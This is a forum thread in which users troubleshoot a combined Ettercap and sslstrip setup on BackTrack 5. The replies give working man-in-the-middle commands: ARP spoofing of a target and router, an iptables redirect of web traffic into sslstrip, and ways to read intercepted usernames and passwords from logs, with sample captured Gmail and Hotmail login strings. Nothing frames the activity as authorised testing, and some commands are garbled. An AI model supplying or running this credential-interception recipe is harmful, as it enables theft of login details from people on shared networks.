Go Back   TechArena Community > Software > Operating Systems
Become a Member!
Forgot your username/password?
Register Tags Active Topics RSS Search Mark Forums Read

Sponsored Links



Ettercap and sslstrip in backtrack 5

Operating Systems


Reply
 
Thread Tools Search this Thread
  #1  
Old 18-06-2011
Member
 
Join Date: May 2011
Posts: 1,580
Ettercap and sslstrip in backtrack 5
  

I have a difficulty with Ettercap and Sslstrip. If I uncomment iptables on etter.conf, ettercap take over ssl, and the browser gives certificate errors. If I keep ignoring the errors, I ultimately get signed in. If I keep the iptables commented on etter.conf, sslstrip seem to get hold of over ssl connections and catches the login information. Nonetheless, the browser gets redirect back to sing up page. Basically, I can't log in. Seeing at the log, the whole thing is forwarded and spoofed appropriately. How can I overcome this problem?

Reply With Quote
  #2  
Old 18-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,416
re: Ettercap and sslstrip in backtrack 5

If you wish to use ettercap as listener and sslstrip. You need to do following thing.
1. Forward physically with echo 1
2. Arpspoof equally ways with arpspoof -i ethx -t
3. Start ettercap as listener and grasp traffic in a file
ettercap -Tqi ethX -u -l my_ssl_data
4. Start iptables and run sslstrip -p -f
5. If you dash in this way ettercap, open an additional terminal and re-check the forwarding you did manually wit: cat /proc/sys.../ip_forward.And you will observe that is "1", because ettercap is in a row with -u, without forwarding.
Reply With Quote
  #3  
Old 18-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,292
re: Ettercap and sslstrip in backtrack 5

Hey guys I was facing the problem in setting up ethcercap and sslstrip I followed the above steps but u also have to check the sslstrip.log and you will observe a lot of information, but the user and password there gmail: Email=zyx@gmail.com&passwd=xxjjxx
hotmail: user=xxgg@hotmail.com&passwd=xx656x
The information in ettercap files with -l limitation, should be my_data_ssl.eci, release it with etterlog.You should install the etherlog (aptitude install etherlog)
expect this help you..I did work for me after two months of inspection videos and evaluating the various posts.
Reply With Quote
  #4  
Old 18-06-2011
Member
 
Join Date: Nov 2008
Posts: 1,185
re: Ettercap and sslstrip in backtrack 5

After doing all settings I can see the captured user and password on ettercap. This is what I did.
sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
sudo iptables -t Nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sudo sslstrip -a -k –f.When I open Gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though. Of course I skipped "echo 1
Reply With Quote
  #5  
Old 18-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,035
re: Ettercap and sslstrip in backtrack 5

It worked for you. As sslstrip is concerned, it should work. You can try this: iptables -t Nat --flush (flush the iptables, it flushes all appended chains to tables, in this case -A PREROUTING -p tcp --destination-port 80).Then re-type or re-enter the chain to the Table: iptables -t Nat - A REROUTING -to-port 10000sslstrip -p -f (I suggest to log only ssl posts which is the default)..Remember that the default port to listen for sslstrip is 10000, so no need to use the -l 10000.the log file will be left on the desktop if you are using Backtrack, if you are using Ubuntu it will be left in the /home/root/ directory, in both cases as sslstrip.log unless you use the -w option and give a path and name lo save the file. If you want to see the file "live" as it runs, open an additional terminal and type: tail -f my_ssldata.log this way you will see all http or https traffic as you navigate through, off course depending on the ssl parameters you use (-p, -a).I used both and the amount of info with -a is too much, unless you want to make a more deep study of traffic, use the -p option (default)..The -f is to show the little favicon showing that is a "secure page “then re-run ettercap. Try it.
Reply With Quote
Reply

  TechArena Community > Software > Operating Systems
Tags: , , , , , ,



Thread Tools Search this Thread
Search this Thread:

Advanced Search


Similar Threads for: "Ettercap and sslstrip in backtrack 5"
Thread Thread Starter Forum Replies Last Post
Backtrack kantu Operating Systems 1 29-09-2011 12:28 PM
Backtrack 5- while scanning for active host, ettercap crashes Haleema Operating Systems 5 22-07-2011 12:46 AM
SSLSTRIP and WIFIZOO in BackTrack 5 Baldwin Operating Systems 5 09-07-2011 08:59 PM
How to upgrade from Backtrack 4 to Backtrack 5 Upendra Operating Systems 6 09-07-2011 08:52 PM
Install sslstrip on backtrack Trini Alvarado Windows Software 6 11-05-2010 10:14 AM


All times are GMT +5.5. The time now is 09:30 AM.